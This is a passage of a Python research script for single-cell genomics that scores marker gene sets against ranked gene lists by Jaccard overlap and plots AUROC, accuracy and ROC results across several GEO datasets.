        with open(os.path.join(dir, fname), 'rb') as f:
            df = pickle.load(f)
        fptpr[header] = df
    plot_auc_result(fptpr, output+'_auc.pdf', col_dict, shape[0:len(marker)][::-1])
def plot_scatter_performance(df, y, header):
    """Bar plot and IN-vs-EX scatter of one performance metric per marker set.

    df must contain 'marker' and 'celltype' columns plus the metric column *y*.
    Saves <header>_bar.pdf and <header>_scat.pdf.
    """
    global AMARKER, MSHAPES
    print(get_palette_shape(df.loc[df.loc[:,'celltype'].str.endswith('IN'),:].shape[0]))
    # Palette sized by the number of IN rows (one row per marker set).
    palette, _ = get_palette_shape(df.loc[df.loc[:,'celltype'].str.endswith('IN'),:].shape[0])
    df.index = df.marker
    hue = df.columns[0]
    print(df)
    df = df.loc[:,[hue, y]]
    print(df)
    print(df.index[~df.index.duplicated()])
    # One color per distinct marker, in first-appearance order.
    col_dict = dict([(h, palette[i]) for i, h in enumerate(df.index[~df.index.duplicated()])])
    kwargs = {'palette':col_dict, 'edgecolor':'k'}
    plot_seaborn_barplot(df.reset_index(), 'marker', y, 'celltype', header+'_bar.pdf', kwargs)
    # Pivot to one row per marker with per-celltype metric columns.
    df = df.pivot(index=None, columns='celltype')
    print(df)
    all_markers = AMARKER
    # First marker in AMARKER is drawn larger (size 100 vs 40).
    kwargs = {'palette':col_dict, 'style':'marker', 'alpha':1, 'markers':dict([(all_markers[i], x) for i, x in enumerate(MSHAPES)]), \
            'size':'marker', 'sizes':dict([(x, 100 if i == 0 else 40) for i, x in enumerate(all_markers)])}
    df.columns = df.columns.droplevel()
    print(df.columns)
    print(df.reset_index())
    plot_seaborn_scatter(df.reset_index(), '2_IN', '1_EX', 'marker', header+'_scat.pdf', kwargs, annot=False, scatter=True)
def plot_scatter_performance_gs(df, y, header):
    """Line plot of metric *y* versus gene-list size, one line per marker set.

    Saves <header>_scat<celltype>.pdf for each celltype present in df.
    """
    global AMARKER, USHAPES
    columns = df.loc[:,'celltype'].str.endswith('IN').values
    if df.loc[(columns),:].shape[0] == 0:
        # No IN rows (e.g. the neuron problem): size the palette by NN rows.
        columns = df.loc[:,'celltype'].str.endswith('NN').values
    palette, shape = get_palette_shape(df.loc[(df.loc[:,'gene_size'] == 100) & (columns),:].shape[0])
    df.index = df.marker
    hue = df.columns[0]
    df = df.loc[:,['gene_size', hue, y]]
    col_dict = dict([(h, palette[i]) for i, h in enumerate(df.index[~df.index.duplicated()])])
    # Dashed lines for markers whose shape code is '--'.
    dash_dict = dict([(h, (2, 2) if shape[i] == '--' else (1, 0)) for i, h in enumerate(df.index[~df.index.duplicated()])])
    print(col_dict, dash_dict)
    kwargs = {'palette':col_dict, 'edgecolor':'k'}
    all_markers = AMARKER
    kwargs = {'palette':col_dict, 'style':'marker', 'dashes':dash_dict, 'alpha':1, 'markers':dict([(all_markers[i], x) for i, x in enumerate(USHAPES)])}
    # dict([(all_markers[i], x) for i, x in enumerate(['o', 'P', 's', '.', '^', '^', '^', '^'])])}
    for celltype in pd.unique(df.loc[:,'celltype']):
        tdf = df.loc[df.loc[:,'celltype'] == celltype,:]
        # Reverse row order so draw/legend order matches marker priority.
        tdf = tdf.iloc[::-1]
        plot_seaborn_scatter(tdf.reset_index(), 'gene_size', y, 'marker', header+'_scat'+celltype+'.pdf', kwargs, annot=False, scatter=False, sort=False)
def read_and_concatenate(dir, roc_files):
    """Read every CSV in *roc_files* from *dir*, tag each row with the GSE id
    parsed from its file name (prefix before the first '_'), and stack the
    frames row-wise. Returns None when roc_files is empty."""
    frames = []
    for fname in roc_files:
        frame = pd.read_csv(os.path.join(dir, fname), header=0, index_col=0)
        frames.append(frame.assign(gse=fname.split('_')[0]))
    if not frames:
        return None
    return pd.concat(frames)
def compare_prom_and_dist():
    """Pairwise comparison of AUROC results across peak-annotation modes
    (gene / distal / proximal) over all datasets, producing scatter plots.

    NOTE(review): the hard-coded path contains 'ipythn' (elsewhere
    'ipython'), and header_list uses 'GSE1303390' where other functions use
    'GSE1303990' -- confirm these spellings.
    """
    global ALL_DATA
    dir = '/home/rkawaguc/ipythn/BICCN/script/Catactor/analysis/191219_meta/output/scobj'
    # One row per dataset: [gene, distal, proximal] AUROC tables.
    roc_datasets = [['BICCN2_gene_id_order_gene__all_auroc.csv', 'BICCN2_distal_id_order_distal__all_auroc.csv', 'BICCN2_proximal_id_proximal__all_auroc.csv'], ['GSE111586_gene_id_order_gene__all_auroc.csv', 'GSE111586_distal_id_order_distal__all_auroc.csv', 'GSE111586_proximal_id_proximal__all_auroc.csv'],
        ['GSE123576_gene_id_order_gene__all_auroc.csv', 'GSE123576_distal_id_order_distal__all_auroc.csv', 'GSE123576_proximal_id_proximal__all_auroc.csv'],
        ['GSE126074_gene_id_order_gene__all_auroc.csv', 'GSE126074_distal_id_order_distal__all_auroc.csv', 'GSE126074_proximal_id_proximal__all_auroc.csv']]
    if ALL_DATA:
        roc_datasets.append(['GSE1303990_gene_id_order_gene__all_auroc.csv', 'GSE1303990_distal_id_order_distal__all_auroc.csv', 'GSE1303990_proximal_id_proximal__all_auroc.csv'])
    peak_location = ['gene', 'distal', 'proximal']
    # Compare mode i against every later mode j.
    for i in range(len(roc_datasets[0])):
        all_results = read_and_concatenate(dir, [roc_datasets[l][i] for l in range(len(roc_datasets))])
        all_results = all_results.assign(loc=peak_location[i])
        for j in range(i+1, len(roc_datasets[0])):
            comp_results = read_and_concatenate(dir, [roc_datasets[l][j] for l in range(len(roc_datasets))])
            comp_results = comp_results.assign(loc=peak_location[j])
            # Inner join gives matched _x/_y metric columns for the two modes.
            merged_results = all_results.merge(comp_results, how='inner', on=['marker', 'celltype', 'target', 'mode', 'gse', 'problem'])
            for type in ['with_SC_', '']:
                if type == '':
                    header_list = ['SF', 'CU', 'TA', 'TN', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303390']
                    temp = merged_results.loc[merged_results['marker'] != 'SC']
                else:
                    header_list = ['SF', 'CU', 'TA', 'TN', 'SC', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257', 'GSE1303390']
                    temp = merged_results.copy()
                # print(temp)
                for cluster in ['celltype', 'cluster', 'neuron', 'inex']:
                    celltypes = (['P', 'N'] if cluster == 'neuron' else ['IN', 'EX'] if cluster == 'inex' else ['IN', 'EX', 'NN'])
                    for mode in ['average', 'rankmean']:
                        header = peak_location[i]+'_'+peak_location[j]+'_'+cluster+'_'+type+mode+'_'
                        print(temp.columns)
                        ttemp = temp.loc[(temp['problem'] == cluster) & (temp['mode'] == mode),:]
                        print(ttemp['marker'])
                        plot_auc_and_acc_scatter(ttemp, header_list, 'scatter_'+header, celltypes)
def plot_auc_and_acc_scatter(df, header_list, header, celltypes=['IN', 'EX', 'NN'], data=False):
    """Scatter AUC and accuracy of mode x vs mode y per celltype, by marker.

    df must carry auc_x/auc_y/acc_x/acc_y columns from a pairwise merge.
    NOTE: mutates df['marker'] into a Categorical in place.
    NOTE(review): mutable default for *celltypes* -- harmless here because
    it is never modified inside the function.
    """
    palette, shape = get_palette_shape(len(header_list), data)
    col_dict = dict([(h, palette[i]) for i, h in enumerate(header_list)])
    # Keep only marker categories actually present in df, in header order.
    exist_header = [x for x in header_list if df['marker'].str.contains(x).any()]
    df['marker'] = pd.Categorical(df['marker'], exist_header)
    # print(df.loc[df['marker'] == 'SF',:])
    for celltype in celltypes:
        tdf = df.loc[df['celltype'] == celltype,:]
        # Spearman correlation between the two modes' AUCs.
        cc, pvalue = spearmanr(tdf['auc_x'], tdf['auc_y'])
        print(header+'_'+celltype+'_auc', cc, pvalue)
        ax = sns.scatterplot(x='auc_x', y="auc_y", hue="marker", data=tdf, palette=col_dict)
        ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
        ax.set_title('Spearman CC='+str(cc)+', p='+str(pvalue), fontdict={'fontsize': 8, 'fontweight': 'medium'})
        plt.savefig(header+'_'+celltype+'_auc.pdf', bbox_inches='tight')
        plt.close('all')
        plt.clf()
        # Same plot for accuracy.
        cc, pvalue = spearmanr(tdf['acc_x'], tdf['acc_y'])
        print(header+'_'+celltype+'_acc', cc, pvalue)
        ax = sns.scatterplot(x='acc_x', y="acc_y", hue="marker", data=tdf, palette=col_dict)
        ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
        ax.set_title('Spearman CC='+str(cc)+', p='+str(pvalue), fontdict={'fontsize': 8, 'fontweight': 'medium'})
        plt.savefig(header+'_'+celltype+'_acc.pdf', bbox_inches='tight')
        plt.close('all')
        plt.clf()
def plot_auc_and_acc_boxplot(df, header_list, header, marker=None, data=False):
    """Box+swarm plots of AUC and accuracy per celltype, grouped by marker set.

    NOTE: mutates df['marker'] into a Categorical in place.
    """
    global AMARKER
    if marker is None:
        marker = AMARKER
    palette, shape = get_palette_shape(len(marker), data=data)
    print(header_list)
    col_dict = dict([(h, palette[i]) for i, h in enumerate(header_list)])
    # Keep only marker categories actually present in df, in header order.
    exist_header = [x for x in header_list if df['marker'].str.contains(x).any()]
    df['marker'] = pd.Categorical(df['marker'], exist_header)
    ax = sns.boxplot(x='celltype', y="auc", hue="marker", data=df, palette=col_dict, showfliers=False)
    ax = sns.swarmplot(x="celltype", y="auc", hue="marker", data=df, color=".2", dodge=True)
    ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
    plt.savefig(header+'_auc.pdf', bbox_inches='tight')
    plt.close('all')
    plt.clf()
    # Same pair of plots for accuracy.
    ax = sns.boxplot(x='celltype', y="acc", hue="marker", data=df, palette=col_dict, showfliers=False)
    ax = sns.swarmplot(x="celltype", y="acc", hue="marker", data=df, color=".2", dodge=True)
    ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
    plt.savefig(header+'_acc.pdf', bbox_inches='tight')
    plt.close('all')
    plt.clf()
def plot_auc_from_exp():
    """Collect AUROC tables from all gene-level datasets and summarize them
    for each marker universe: '' = published markers, 'with_SC_' = including
    the SC set, 'data_' = dataset-derived marker sets."""
    global AMARKER, PMARKER, SET, ALL_DATA
    dir = '/home/rkawaguc/ipython/BICCN/script/Catactor/analysis/191219_meta/output/scobj'
    tdir = '/home/rkawaguc/ipython/BICCN/script/Catactor/analysis/191219_meta/'
    roc_files = ['BICCN2_gene_id_order_gene__all_auroc.csv', 'GSE111586_gene_id_order_gene__all_auroc.csv', 'GSE123576_gene_id_order_gene__all_auroc.csv', 'GSE126074_gene_id_order_gene__all_auroc.csv', 'GSE127257_distal_id_gene_order__all_auroc.csv']
    if ALL_DATA:
        roc_files.extend(['GSE1303990_gene_id_order_gene__all_auroc.csv'])
    # Stack all AUROC tables, tagging rows with the source GSE id.
    all_results = None
    for fname in roc_files:
        df = pd.read_csv(os.path.join(dir, fname), header=0, index_col=0)
        gse = fname.split('_')[0]
        df = df.assign(gse=gse)
        if all_results is None: all_results = df
        else: all_results = pd.concat([all_results, df])
    for type in ['with_SC_', '', 'data_'][::-1]:
        if type == '':
            header_list = PMARKER[0:(SET-1)]
        else:
            if type == 'with_SC_':
                header_list = AMARKER[0:SET]
            else:
                header_list = ['SF', 'BICCN2', 'GSE111586', 'GSE123576', 'GSE126074', 'GSE127257']
                if ALL_DATA:
                    header_list.append('GSE1303990')
        print(all_results['marker'].unique())
        temp = all_results.copy()
        temp['marker'] = pd.Categorical(temp['marker'], header_list)
        # Drop rows whose marker is outside this universe (Categorical -> NaN;
        # x == x is False only for NaN).
        temp = temp.loc[[x == x for x in temp['marker']],:]
        print(temp['marker'].unique())
        collect_auc_exp_marker_set(temp, header_list, type, dir, tdir, roc_files)
def collect_auc_exp_marker_set(df, header_list, type, dir, tdir, roc_files):
    """Summarize AUROC results for one marker universe.

    Produces per-problem/mode boxplots and per-celltype export tables; the
    per-dataset ROC figure calls are currently commented out.
    """
    smarkers = header_list
    for cluster in ['celltype', 'cluster', 'neuron', 'inex']:
        for mode in ['average', 'rankmean']:
            header = cluster+'_'+type+mode+'_'
            ttemp = df.loc[(df['problem'] == cluster) & (df['mode'] == mode),:]
            ttemp = ttemp.loc[np.array([(row['marker'] != row['gse']) for i, row in ttemp.iterrows()]),:] # remove prediction by marker genes from the same dataset
            plot_auc_and_acc_boxplot(ttemp, header_list, 'performance_'+header, data=(type == 'data_'))
            print(ttemp['marker'].unique())
            celltypes = (['P', 'N'] if cluster == 'neuron' else ['IN', 'EX'] if cluster == 'inex' else ['IN', 'EX', 'NN'])
            for celltype in celltypes:
                for gse in ttemp['gse'].unique():
                    gse_data = ttemp.loc[(ttemp['gse'] == gse) & (ttemp['celltype'] == celltype),:]
                    gse_data = gse_data.sort_values('marker')
                    tgse_data = gse_data.loc[[(x in smarkers) for x in gse_data['marker']],:]
                    print(tgse_data['marker'].unique())
                    print(tgse_data['marker'])
                    if type == 'data_':
                        # Exclude self-prediction in the data-derived universe.
                        tgse_data = tgse_data.loc[[(x != gse) for x in tgse_data['marker']],:]
                    # draw_auc_selected_each(tgse_data['roc_file'].tolist(), tgse_data['marker'].tolist(), 'roc_'+header+celltype+'_'+gse, dir=tdir, marker=smarkers, data=(type == 'data_'))
                # Additionally load the '<gse>_rna_...' AUROC tables
                # (presumably the paired RNA modality -- confirm).
                for rna in ['GSE126074', 'GSE1303990']:
                    if rna not in ttemp['gse'].unique():
                        continue
                    gse_data = pd.read_csv(os.path.join(dir, rna+'_rna_distal_global_index__all_auroc.csv'), header=0, index_col=0)
                    gse_data = gse_data.assign(gse=rna+'r')
                    print(rna, gse_data, os.path.join(dir, rna+'_rna_distal_global_index__all_auroc.csv'))
                    gse_data['marker'] = pd.Categorical(gse_data['marker'], header_list)
                    gse_data = gse_data.loc[(gse_data['problem'] == cluster) & (gse_data['mode'] == mode) & (gse_data['celltype'] == celltype),:]
                    gse_data = gse_data.sort_values('marker')
                    tgse_data = gse_data.loc[[(x in smarkers) for x in gse_data['marker']],:]
                    print(cluster, mode, celltype)
                    # NOTE(review): exit() aborts the whole process when a
                    # combination yields no rows -- consider `continue`.
                    if tgse_data.shape[0] == 0:
                        exit()
                    # draw_auc_selected_each(tgse_data['roc_file'].tolist(), tgse_data['marker'].tolist(), 'roc_'+header+celltype+'_'+rna+'r', dir=tdir, marker=smarkers, data=(type == 'data_'))
                    print(tgse_data)
                ttemp.to_csv(cluster+'_'+mode+'_'+celltype+'_extable.csv')
def summarize_auc_result():
    """Aggregate per-setting AUROC CSVs into summary ROC and scatter plots.

    For each marker universe (with/without the SC set), clustering level and
    sub-problem, reads gene_<cluster><problem>_<size>_auroc.csv, orders the
    marker column, and draws ROC summaries plus AUC/accuracy scatter plots
    (per gene size and across all GENE_SIZES).

    BUGFIX: the marker column was previously assigned `df.astype(cat_type)`
    (the whole frame cast, a DataFrame, assigned to one column); it now
    casts only the 'marker' column, matching the Categorical usage elsewhere
    in this file. Fixed in both the per-size and the all-sizes loops.
    """
    global AMARKER, PMARKER
    for type in ['', 'with_SC']:
        if type == 'with_SC':
            header_list = AMARKER
        else:
            header_list = PMARKER
        # for cluster in ['celltype', 'cluster', 'icluster']:
        for cluster in ['celltype', 'icluster']:
            for problem in ['', '_neuron', '_inex']:
                # Sub-problems are only defined at the cluster levels.
                if 'cluster' not in cluster and problem != '':
                    continue
                for gene_size in [100, 1000]:
                    fname = 'gene_'+cluster+problem+'_'+str(gene_size)+'_auroc.csv'
                    print(fname)
                    df = pd.read_csv(fname, index_col=0)
                    if type == '':
                        # Published-only universe: drop the derived SC set.
                        df = df.loc[~df.loc[:,'marker'].str.endswith('SC'),:]
                    # Reduce composite names like 'a_b_SF_100' to the set code.
                    df.loc[:,'marker'] = [x if '_' not in x else x.split('_')[-2] for x in df.loc[:,'marker'].values]
                    print(df['marker'])
                    cat_type = pd.CategoricalDtype(categories=header_list, ordered=True)
                    df.loc[:,'marker'] = df.loc[:,'marker'].astype(cat_type)
                    print(df['marker'])
                    df = df.sort_values(by='marker')
                    df.loc[:,'norm'] = df.loc[:,'norm'].fillna('')
                    print(df)
                    for norm in ['', '_normed']:
                        file_list = ['gene_'+cluster+'_'+h+'_'+str(gene_size)+problem+norm+'_fptpr.npy' for h in header_list]
                        draw_auc_selected(file_list, header_list, 'pred_result_'+cluster+problem+'_'+str(gene_size)+norm+type)
                        if problem == '':
                            plot_scatter_performance(df.loc[df.loc[:,'norm'] == norm,:], 'auc', 'pred_result_'+cluster+'_'+str(gene_size)+problem+norm+'_'+'auc'+type)
                            plot_scatter_performance(df.loc[df.loc[:,'norm'] == norm,:], 'accuracy', 'pred_result_'+cluster+'_'+str(gene_size)+problem+norm+'_'+'acc'+type)
                # Second pass: combine every gene size into one table for the
                # metric-vs-size plots.
                all_df = None
                for gene_size in GENE_SIZES:
                    fname = 'gene_'+cluster+problem+'_'+str(gene_size)+'_auroc.csv'
                    print(fname)
                    df = pd.read_csv(fname, index_col=0)
                    if type == '':
                        df = df.loc[~df.loc[:,'marker'].str.endswith('SC'),:]
                    df.loc[:,'marker'] = [x if '_' not in x else x.split('_')[-2] for x in df.loc[:,'marker'].values]
                    print(df['marker'])
                    cat_type = pd.CategoricalDtype(categories=header_list, ordered=True)
                    df.loc[:,'marker'] = df.loc[:,'marker'].astype(cat_type)
                    df.loc[:,'gene_size'] = gene_size
                    if all_df is None: all_df = df
                    else: all_df = pd.concat((all_df, df))
                all_df = all_df.sort_values(by='marker')
                all_df.loc[:,'norm'] = all_df.loc[:,'norm'].fillna('')
                for norm in ['', '_normed']:
                    print(all_df)
                    plot_scatter_performance_gs(all_df.loc[all_df.loc[:,'norm'] == norm,:], 'auc', 'pred_result_'+cluster+'_all'+problem+norm+'_'+'auc'+type)
                    plot_scatter_performance_gs(all_df.loc[all_df.loc[:,'norm'] == norm,:], 'accuracy', 'pred_result_'+cluster+'_all'+problem+norm+'_'+'acc'+type)
def plot_heatmap_rank():
    """Run the Jaccard heatmap comparison for the celltype- and icluster-level
    ranked gene lists (the cluster-level variant is currently disabled)."""
    for level, annotated in (('celltype', True), ('icluster', False)):
        comp_jaccard_gene_list(['rank_gene_list_'+level+'.csv'], ['marker_name_list.csv'], 'gene_'+level, annotated)
def plot_auc_result(fptpr, output, col_dict=None, shape=None):
    """Draw one ROC curve per entry of *fptpr* ({label: [fpr, tpr]}) and save
    the figure to *output*.

    When no color mapping is given, a reversed Set2 palette keyed by
    0_NN/1_EX/2_IN is used and every curve is drawn with a solid line;
    labels missing from col_dict fall back to the '0_NN' color.
    """
    import seaborn as sns
    plt.figure(figsize=(6, 5))
    lw = 2
    if col_dict is None:
        fallback = sns.color_palette('Set2', 3)[::-1]
        col_dict = {label: fallback[i] for i, label in enumerate(['0_NN', '1_EX', '2_IN'])}
        shape = ['-'] * len(fptpr)
    for i, label in enumerate(fptpr):
        color = col_dict[label] if label in col_dict else col_dict['0_NN']
        fpr, tpr = fptpr[label][0], fptpr[label][1]
        plt.plot(fpr, tpr, shape[i]+'o', color=color, lw=lw, label=label)
    # Chance diagonal for reference.
    plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')
    plt.xlim([0.0, 1.0])
    plt.ylim([0.0, 1.05])
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.title('Receiver operating characteristic curve')
    plt.legend(loc="lower right")
    plt.savefig(output)
    plt.close('all')
    plt.clf()
def get_max_indices(Y_pred):
    """Return a 0/1 matrix marking, per column, the strictly-unique positive
    row maximum of *Y_pred* (ties and non-positive maxima yield all zeros)."""
    n_rows = Y_pred.shape[0]
    n_cols = Y_pred.shape[1]
    rows = []
    for r in range(n_rows):
        others = [h for h in range(n_rows) if h != r]
        flags = []
        for c in range(n_cols):
            top = Y_pred[:, c].max()
            # Short-circuit keeps the empty-others max unevaluated unless
            # this cell is already a positive column maximum.
            hit = Y_pred[r, c] == top and Y_pred[r, c] > 0 and max(Y_pred[others, c]) < top
            flags.append(1 if hit else 0)
        rows.append(flags)
    return np.array(rows)
def comp_auroc(df, marker, header, annotated, sm_marker=None, problem=''):
    """Score marker sets against ranked gene-list columns; compute AUROC/accuracy.

    df        -- ranked gene lists (one column per cluster/celltype).
    marker    -- marker table (one column per class); only the top 1000 rows used.
    annotated -- optional cluster -> celltype map (None when columns are
                 already celltype-labelled).
    sm_marker -- optional subtype marker table for a second-stage comparison.
    problem   -- '' (3-class), '_inex' (IN vs EX) or '_neuron' (neuron vs not).
    Returns a DataFrame [celltype, auc, accuracy, norm] with marker=header,
    or None when nothing was scored. Also pickles per-class fp/tp arrays.
    """
    result = []
    marker = marker.iloc[0:1000,:]
    # Jaccard similarity of each marker class (row) vs each data column.
    Y_pred = np.array([[compute_jaccard(marker.loc[:,c], df.loc[:,j]) for j in df.columns] for c in marker.columns])
    sm_pred = None
    print(marker.iloc[:,0], df.iloc[:,0])
    print(Y_pred.shape)
    print('marker_order', marker.columns)
    # Second iteration row/column-normalizes Y_pred in place for '_normed'.
    for norm in ['', '_normed']:
        if len(norm) > 0: # norm for each signal type
            Y_pred = norm_row_columns(Y_pred)
        if problem == '':
            col_ind, col_color = plot_cluster_against_marker_dist(marker.columns, df.columns, Y_pred, header, '_auc'+norm, annotated)
            print(header+'_auc'+norm, col_ind)
        # Binary prediction: per column, the unique positive row maximum.
        Y_pred_bin = get_max_indices(Y_pred)
        if annotated is None:
            # assumes the celltype token sits in '_' fields 3-4 of the
            # column names -- TODO confirm against the rank CSV layout.
            labels = convert_sample_to_label(['_'.join(x.split('_')[3:5]) for x in df.columns], annotated, problem)
        else:
            labels = convert_sample_to_label(df.columns, annotated, problem)
        fptpr = {}
        for i, c in enumerate(marker.columns):
            # Skip classes irrelevant to the current problem.
            if 'NA' in c:
                continue
            if problem == '_inex' and 'NN' in c:
                continue
            elif problem == '_neuron' and 'NN' not in c:
                continue
            print(c, 'vs', labels)
            if problem in ['', '_inex']:
                y_true = [1 if x else 0 for x in pd.Series(labels).str.contains((c.split('_')[1] if '_' in c else c))]
            else:
                y_true = [1 if '0_N' in x else 0 for x in labels]
            if sum(y_true) == 0:
                # No positive example: AUROC would be ill-defined; just log.
                print('sum == 0')
                print(header, problem)
                print(labels)
                print(y_true)
                print('????')
                # exit()
            y_pred = Y_pred[i,:]
            print(y_true, y_pred)
            fpr, tpr, thresholds = metrics.roc_curve(y_true, y_pred, pos_label=1)
            fptpr[c] = [fpr, tpr]
            auc = metrics.auc(fpr, tpr)
            # Accuracy of the binarized (unique-argmax) assignment.
            y_pred = Y_pred_bin[i,:]
            acc = metrics.accuracy_score(y_true, y_pred)
            result.append([c, auc, acc, norm])
            print(result)
            if problem != '':
                continue
            if sm_marker is not None and 'NN' not in c:
                # Second stage: subtype markers vs only the columns predicted
                # as this class, in dendrogram order (col_ind/col_color are
                # bound above because problem == '' here).
                selected = [ True if y_pred[j] == 1 else False for j in range(df.shape[1])]
                selected_order = [j for j in col_ind if y_pred[j]]
                selected_color = [col_color[h] for h, j in enumerate(col_ind) if y_pred[j]]
                selected_marker = [sc for sc in sm_marker if c.split('_')[1] in sc]
                sm_pred = np.array([[compute_jaccard(sm_marker.loc[:,sc], df.iloc[:,j]) for j in selected_order] for sc in selected_marker])
                if norm != '':
                    sm_pred = norm_row_columns(sm_pred)
                plot_cluster_against_marker_dist(selected_marker, df.iloc[:,selected_order].columns, sm_pred, header, '_sm_auc'+norm+'_'+c, annotated, [selected_color])
        # Persist the fp/tp curves for later combined ROC figures.
        with open(header+problem+norm+'_fptpr.npy', 'wb') as f:
            pickle.dump(fptpr, f)
        if problem == '':
            plot_auc_result(fptpr, header+norm+'_auc.pdf')
    result_df = pd.DataFrame(result, columns=['celltype', 'auc', 'accuracy', 'norm'])
    if result_df.shape[0] == 0:
        return None
    result_df.loc[:,'marker'] = header
    return result_df
def evaluate_classification_acc_by_overlap(target_list, marker_list, header, ref_marker):
    """Evaluate how well marker sets classify a dataset's ranked-gene columns.

    target_list -- CSV of ranked genes per cluster/celltype (columns).
    marker_list -- CSV of curated marker gene sets.
    ref_marker  -- CSV of reference ranked lists from other datasets, used as
                   data-derived "marker" sets.
    Writes <header><problem>_<gene_size>_auroc.csv for each setting.
    """
    global GENE_SIZES
    data = pd.read_csv(target_list, index_col=0)
    marker = pd.read_csv(marker_list, index_col=0)
    print(marker.columns)
    ref_data = pd.read_csv(ref_marker, index_col=0)
    print(ref_data.columns)
    # NOTE(review): local name shadows the builtin `dict`.
    dict = (read_cluster_assignment(icluster=('icluster' in header)) if 'cluster' in header else None)
    sample_types = convert_sample_to_label(data.columns, dict)
    # Drop columns whose label contains NA.
    data = data.loc[:,[("NA" not in x) for x in sample_types]]
    sample_types = [x for x in sample_types if "NA" not in x]
    for problem in ['', '_inex', '_neuron']:
        # Sub-problems are only evaluated at the cluster levels.
        if 'cluster' not in header and problem != '':
            continue
        for gene_size in GENE_SIZES:
            result = None
            df = data.iloc[0:gene_size,:]
            # Curated marker universes.
            for m in ['SF', 'SC', 'CU', 'TA', 'TN']:
                sm_marker = marker.loc[:,marker.columns.str.contains(pat='SM')]
                print(header, m, str(gene_size))
                theader = header+'_'+m+'_'+str(gene_size)
                temp = marker.loc[:,marker.columns.str.contains(pat=m)]
                temp.columns = ['_'.join(x.split('_')[1:]) for x in temp.columns]
                temp.columns = get_celltype_category(temp.columns)
                # Subtype (SM) stage only for cluster-level 100/1000 full runs.
                if gene_size in [100, 1000] and 'cluster' in header and problem == '':
                    tresult = comp_auroc(df.iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, sm_marker.iloc[0:gene_size,:], problem=problem)
                else:
                    tresult = comp_auroc(df.iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, problem=problem)
                # NOTE(review): comp_auroc may return None (no class scored);
                # the next line would then raise AttributeError -- confirm
                # every marker group always yields at least one class here.
                tresult.loc[:,'marker'] = m
                if result is None:
                    result = tresult
                else:
                    result = pd.concat([result, tresult])
            print('aaaaa')
            print(gene_size)
            # Data-derived markers: each other dataset's own ranked lists.
            for gse in set([x.split('_')[0] for x in ref_data.columns]):
                print(gse)
                theader = header+'_'+gse+'_'+str(gene_size)
                temp = ref_data.loc[:,ref_data.columns.str.contains(pat=gse)].iloc[0:gene_size,:]
                temp.columns = ['_'.join(x.split('_')[3:5]) for x in temp.columns]
                print(temp.head())
                print('oueaeu')
                if len(temp.columns) > 4: # use only the dataset having 3 cell types
                    continue
                print('???????????')
                print(temp.columns)
                temp = temp.loc[:,[c for c in temp.columns if 'NA' not in c]]
                # Exclude the reference dataset's own columns from the target.
                tresult = comp_auroc(df.loc[:,~df.columns.str.contains(gse)].iloc[0:gene_size,:], temp.iloc[0:gene_size,:], theader, dict, problem=problem)
                result = pd.concat([result, tresult])
            result.to_csv(header+problem+'_'+str(gene_size)+'_auroc.csv')
def rank_evaluation(rank_list=None, marker_list=None, header=None, ref_data_list=None):
    """Run the overlap-based classification evaluation.

    With no arguments, evaluates the default celltype- and icluster-level
    ranked lists; with explicit arguments, evaluates that single setting.

    BUGFIX: the else-branch previously executed a bare ``return`` before an
    unreachable call that also misspelled the function name
    (``evaluate_classfication_acc_by_overlap``), so explicit arguments were
    silently ignored; the custom setting is now actually evaluated.
    """
    if rank_list is None:
        evaluate_classification_acc_by_overlap('rank_gene_list_celltype.csv', 'marker_name_list.csv', 'gene_celltype', 'rank_gene_list_celltype.csv')
        # evaluate_classification_acc_by_overlap('rank_gene_list_cluster.csv', 'marker_name_list.csv', 'gene_cluster', 'rank_gene_list_celltype.csv')
        evaluate_classification_acc_by_overlap('rank_gene_list_icluster.csv', 'marker_name_list.csv', 'gene_icluster', 'rank_gene_list_celltype.csv')
    else:
        evaluate_classification_acc_by_overlap(rank_list, marker_list, header, ref_data_list)
# def plot_raw_signals_of_markers(mdirs, mfiles):
# for i, (mdir, mflist) in enumerate(zip(mdirs, mfiles)):
# if i == 3: break # Do not apply for detailed marker sets
# for j, mfile in enumerate(mflist):
# plot_specific_features("GSE123576_gene_id_order_gene__all_scanpy_obj.pyn", "GSE123576_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE111586_gene_id_order_gene__all_bin_scanpy_obj.pyn", "GSE111586_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE126074_gene_id_order_gene__all_scanpy_obj.pyn", "GSE126074_gene", os.path.join(mdir, mfile))
# plot_specific_features("GSE127257_distal_id_gene_order__all_scanpy_obj.pyn", "GSE127257_gene", os.path.join(mdir, mfile), marker=True)
# plot_specific_features("BICCN_gene_id_order_gene__all_bin_scanpy_obj.pyn", "BICCN_gene", os.path.join(mdir, mfile), marker=True)
def integrate_rank_data(mdirs, mfiles):
    """Merge all curated marker files into one table and compare the ranks.

    Each marker source (SF/CU/TA/TN plus the detailed SM set) contributes one
    DataFrame whose columns are '<source>_<celltype>'; the frames are joined
    column-wise, SF columns are additionally duplicated as 'SC' columns
    restricted to genes present in the matching CU column, and the result is
    written to marker_name_list.csv before cross-dataset rank comparison.
    """
    source_tags = ['SF', 'CU', 'TA', 'TN', 'SM']
    coarse_types = ['IN', 'EX', 'NN']
    fine_types = ['EX_L2.3.IT', 'EX_L5.6.NP', 'EX_L5.ET', 'EX_L5.IT', 'EX_L6.CT', 'EX_L6.IT.Car3', 'EX_L6b', 'IN_Lamp5', 'IN_Pvalb', 'IN_Sncg', 'IN_Sst', 'IN_Vip']
    frames = {}
    for idx, (marker_dir, file_list) in enumerate(zip(mdirs, mfiles)):
        tag = source_tags[idx]
        # The SM source is split by detailed subtype; all others use the
        # coarse IN/EX/NN labels.
        labels = fine_types if tag == 'SM' else coarse_types
        frames[tag] = pd.DataFrame({
            tag + "_" + labels[k]: read_markers(os.path.join(marker_dir, fname))
            for k, fname in enumerate(file_list)
        })
